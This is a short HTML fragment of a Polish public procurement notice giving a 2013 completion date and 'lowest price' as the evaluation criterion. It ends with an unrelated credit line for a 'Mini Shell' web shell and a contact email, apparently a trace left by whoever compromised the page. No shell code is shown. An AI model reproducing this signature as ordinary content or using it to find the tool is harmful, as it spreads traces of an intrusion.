<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com